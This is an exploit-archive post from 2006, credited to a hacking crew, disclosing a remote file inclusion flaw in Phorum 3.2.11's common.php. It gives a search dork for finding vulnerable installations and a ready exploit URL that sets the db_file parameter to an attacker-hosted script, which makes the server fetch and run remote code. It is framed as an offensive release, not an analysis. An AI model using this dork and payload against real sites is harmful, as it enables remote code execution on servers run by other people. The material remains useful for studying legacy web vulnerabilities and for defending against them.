Phorum <= 3.2.11 (common.php) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Phorum <= 3.2.11 (common.php) Remote File Include Vulnerability
# Published : 2006-12-06
# Author : Mr-m07
# Previous Title : J-OWAMP Web Interface <= 2.1b (link) Remote File Include Exploit
# Next Title : cutenews aj-fork <= 167f (cutepath) Remote File Include Vulnerability

===========================================================
Yee7TeaM

WwW.Yee7.CoM
===========================================================

Software: Phorum v3.2.11

Vendor: http://www.phorum.org/

Download: http://skrypty.webpc.pl/pobierz274.html

Dork: "Copyright (C) 2000  Phorum Development Team"  and back form doc
folder :)

Description:

Line 31 of common.php

>
>>  // $db_file = './db/postgresql65.php';
>

Exploit: http://[localhost]/[paTh]/common.php?db_file=[Ev!lScript]


===========================================================
By: Mr-m07
Thanx To: ShockShadow & AL-SHIKH
WwW.Yee7.CoM
===========================================================

# www.Syue.com [2006-12-06]